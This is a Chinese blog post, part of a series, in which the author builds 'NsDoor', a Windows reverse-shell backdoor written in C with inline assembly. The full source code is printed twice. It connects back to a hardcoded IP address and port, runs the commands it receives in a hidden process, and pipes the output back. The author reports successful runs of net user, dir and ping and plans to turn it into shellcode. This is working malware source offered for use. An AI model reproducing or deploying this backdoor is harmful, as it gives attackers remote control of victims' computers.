循环渐进NsDoor(七)
本来这个和上一篇就是连着的,但是上一篇也太长了点
所以在这再开始
本来这个和上一篇就是连着的,但是上一篇也太长了点
所以在这再开始
//#include<iostream>
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
//using namespace std;
//#define PORT 1517
//#define IP "192.168.6.20"
int main()
{
//WSADATA ws;
//WSAStartup(MAKEWORD(2,2),&ws);
_asm
{
mov eax,0x71A26A55
mov [ebp+4],eax; WSAStartup
mov eax,0x71A24211
mov [ebp+8],eax; socket
mov eax,0x7C81D827
mov [ebp+12],eax; CreatePipe
mov eax,0x71A2676F
mov [ebp+16],eax; recv
mov eax,0x7C802446
mov [ebp+20],eax; Sleep
mov eax,0x7C922435
mov [ebp+24],eax; memset
mov eax,0x7C80236B
mov [ebp+28],eax; CreateProcessA
mov eax,0x71A24A07
mov [ebp+32],eax; connect
mov eax,0x71A24C27
mov [ebp+36],eax ; send
mov eax,0x7C801812
mov [ebp+40],eax ; ReadFile
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+80],0
}
_asm
{
sub esp,400
push esp
push 0x202
call [ebp+4]
}
//SOCKET sockfd;
//sockfd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
_asm
{
push 6
push 1
push 2
call [ebp+8]
//mov sockfd,eax
mov ebx,eax
}
//struct sockaddr_in server;
//server.sin_family = AF_INET;
//server.sin_port = htons(PORT);
//server.sin_addr.S_un.S_addr = inet_addr(IP);
//while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);
_asm
{
conn:
push 0x1406A8C0
mov eax,0xED050002
push eax
mov esi,esp
push 0x10
push esi
push ebx
call [ebp+32]
cmp eax,-1
je conn
}
//SECURITY_ATTRIBUTES pipeattr;
//HANDLE hReadPipe,hWritePipe;
//pipeattr.nLength = 12;
//pipeattr.bInheritHandle = true;
//pipeattr.lpSecurityDescriptor = 0;
//SECURITY_ATTRIBUTES* ppi = &pipeattr;
//int size = sizeof pipeattr;
//cout<<&pipeattr<<endl<<size<<endl;
//CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);
//HANDLE* pr,pw;
//pr = &hReadPipe;
//pw = &hWritePipe;
_asm
{
push 0x00000001
push 0x00000000
push 0x0000000c
mov eax,esp
push 0
push eax
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
call [ebp+12]
}
//STARTUPINFOA si;
//cout<<&si<<endl<<sizeof si<<endl;
//ZeroMemory(&si,sizeof si);
//si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
//si.wShowWindow = SW_HIDE;
//si.hStdOutput = si.hStdError = hWritePipe;//木输入管道
//cout<<&si<<endl<<sizeof si<<endl;
_asm
{
push 0x00000F8C
push 0x00000F8C
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000101
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
mov edi,esp
}
//unsigned long lBytesRead = 0;
//PROCESS_INFORMATION ProcessInformation;
//char Buf[1024] = {0};
//char RecvBuf[200] = {0};
while(true)
{
//recv(sockfd,RecvBuf,200,0);
_asm
{
push 0
push 200
lea eax,[ebp-4cch]
push eax
push ebx
call [ebp+16]
}
//cout<<RecvBuf<<endl;
//while(CreateProcessA(NULL,RecvBuf,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);
//STARTUPINFOA* psi = &si;
//PROCESS_INFORMATION* proc = &ProcessInformation;
//cout<<proc<<endl<<sizeof ProcessInformation<<endl;
_asm
{
conn2:
push 0x7c969564
push 0x7c98d144
push 0xffffffff
push 0x7c98d168
mov eax,esp
push eax
push edi
push 0
push 0
push 0
push 1
push 0
push 0
lea eax,[ebp-4cch]
push eax
push 0
call [ebp+28]
cmp eax,0
je conn2
}
//Sleep(1000);
_asm
{
push 300
call [ebp+20]
}
//cout<<RecvBuf<<endl;
// ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);
//LPDWORD plbr = &lBytesRead;
_asm
{
push 0
push edi
push 1024
lea eax,[ebp-4cbh]
push eax
push [ebp+56]
call [ebp+40]
}
// cout<<Buf<<endl;
//cout<<"flag"<<endl;
//send(sockfd,Buf,1024,0);
_asm
{
push 0
push [edi]
lea eax,[ebp-4cbh]
push eax
push ebx
call esi
}
//cout<<Buf<<endl;
//memset(Buf,0,1024);
_asm
{
push 1024
push 0
lea eax,[ebp-4cbh]
push eax
call [ebp+24]
}
//Sleep(100);
_asm
{
push 100
call [ebp+20]
}
//memset(RecvBuf,0,200);
_asm
{
push 200
push 0
lea eax,[ebp-4cch]
push eax
call [ebp+24]
}
}
return 0;
}
#include<winsock2.h>
#pragma comment(lib,"Ws2_32")
//using namespace std;
//#define PORT 1517
//#define IP "192.168.6.20"
int main()
{
//WSADATA ws;
//WSAStartup(MAKEWORD(2,2),&ws);
_asm
{
mov eax,0x71A26A55
mov [ebp+4],eax; WSAStartup
mov eax,0x71A24211
mov [ebp+8],eax; socket
mov eax,0x7C81D827
mov [ebp+12],eax; CreatePipe
mov eax,0x71A2676F
mov [ebp+16],eax; recv
mov eax,0x7C802446
mov [ebp+20],eax; Sleep
mov eax,0x7C922435
mov [ebp+24],eax; memset
mov eax,0x7C80236B
mov [ebp+28],eax; CreateProcessA
mov eax,0x71A24A07
mov [ebp+32],eax; connect
mov eax,0x71A24C27
mov [ebp+36],eax ; send
mov eax,0x7C801812
mov [ebp+40],eax ; ReadFile
mov [ebp+56],0
mov [ebp+60],0
mov [ebp+80],0
}
_asm
{
sub esp,400
push esp
push 0x202
call [ebp+4]
}
//SOCKET sockfd;
//sockfd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
_asm
{
push 6
push 1
push 2
call [ebp+8]
//mov sockfd,eax
mov ebx,eax
}
//struct sockaddr_in server;
//server.sin_family = AF_INET;
//server.sin_port = htons(PORT);
//server.sin_addr.S_un.S_addr = inet_addr(IP);
//while(connect(sockfd,(struct sockaddr*)&server,sizeof server) == -1);
_asm
{
conn:
push 0x1406A8C0
mov eax,0xED050002
push eax
mov esi,esp
push 0x10
push esi
push ebx
call [ebp+32]
cmp eax,-1
je conn
}
//SECURITY_ATTRIBUTES pipeattr;
//HANDLE hReadPipe,hWritePipe;
//pipeattr.nLength = 12;
//pipeattr.bInheritHandle = true;
//pipeattr.lpSecurityDescriptor = 0;
//SECURITY_ATTRIBUTES* ppi = &pipeattr;
//int size = sizeof pipeattr;
//cout<<&pipeattr<<endl<<size<<endl;
//CreatePipe(&hReadPipe,&hWritePipe,&pipeattr,0);
//HANDLE* pr,pw;
//pr = &hReadPipe;
//pw = &hWritePipe;
_asm
{
push 0x00000001
push 0x00000000
push 0x0000000c
mov eax,esp
push 0
push eax
lea eax, [ebp+60] ;&hWritePipe1
push eax
lea eax, [ebp+56] ;&hReadPipe1
push eax
call [ebp+12]
}
//STARTUPINFOA si;
//cout<<&si<<endl<<sizeof si<<endl;
//ZeroMemory(&si,sizeof si);
//si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
//si.wShowWindow = SW_HIDE;
//si.hStdOutput = si.hStdError = hWritePipe;//木输入管道
//cout<<&si<<endl<<sizeof si<<endl;
_asm
{
push 0x00000F8C
push 0x00000F8C
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000101
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
push 0x00000000
mov edi,esp
}
//unsigned long lBytesRead = 0;
//PROCESS_INFORMATION ProcessInformation;
//char Buf[1024] = {0};
//char RecvBuf[200] = {0};
while(true)
{
//recv(sockfd,RecvBuf,200,0);
_asm
{
push 0
push 200
lea eax,[ebp-4cch]
push eax
push ebx
call [ebp+16]
}
//cout<<RecvBuf<<endl;
//while(CreateProcessA(NULL,RecvBuf,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&ProcessInformation)==0);
//STARTUPINFOA* psi = &si;
//PROCESS_INFORMATION* proc = &ProcessInformation;
//cout<<proc<<endl<<sizeof ProcessInformation<<endl;
_asm
{
conn2:
push 0x7c969564
push 0x7c98d144
push 0xffffffff
push 0x7c98d168
mov eax,esp
push eax
push edi
push 0
push 0
push 0
push 1
push 0
push 0
lea eax,[ebp-4cch]
push eax
push 0
call [ebp+28]
cmp eax,0
je conn2
}
//Sleep(1000);
_asm
{
push 300
call [ebp+20]
}
//cout<<RecvBuf<<endl;
// ReadFile(hReadPipe,Buf,1024,&lBytesRead,0);
//LPDWORD plbr = &lBytesRead;
_asm
{
push 0
push edi
push 1024
lea eax,[ebp-4cbh]
push eax
push [ebp+56]
call [ebp+40]
}
// cout<<Buf<<endl;
//cout<<"flag"<<endl;
//send(sockfd,Buf,1024,0);
_asm
{
push 0
push [edi]
lea eax,[ebp-4cbh]
push eax
push ebx
call esi
}
//cout<<Buf<<endl;
//memset(Buf,0,1024);
_asm
{
push 1024
push 0
lea eax,[ebp-4cbh]
push eax
call [ebp+24]
}
//Sleep(100);
_asm
{
push 100
call [ebp+20]
}
//memset(RecvBuf,0,200);
_asm
{
push 200
push 0
lea eax,[ebp-4cch]
push eax
call [ebp+24]
}
}
return 0;
}
前面已经分析了很多函数,我下面就不仔细分析了,把我分析好的代码贴出来show下,呵呵:
呵呵,很强大吧
看着轻松,我花了三天才搞定所有,里面的意外太多了,内存一个字节一个字节的抠数据,地址跳转不对,返回值被刷掉,意外太多了….
累死我了
测试报告:
目前这个代码基本能使用,偶尔出现死在ReadFile处的事情,这个很早以前就遇到过,还有时候会遇到Send函数的地址访问冲突,
但是debug的时候都很正常,反弹后门完全可以使用,不是debug时,偶尔会出现客户端和服务端互相等待的事情….
服务端
客户端
呵呵,访问成功啦
执行net user和time的情形
Dir的结果
Dir&time的结果
输入错误的结果
Ping的结果,照样出现延迟,不过一点也不影响结果,呵呵
哈哈,到这里NsDoor的前期版本,或者说服务端优化基本快完了,技术性的工作已经没了,期待 shellcode吧
---------------by NewSketcher
Time: 080822 21:20
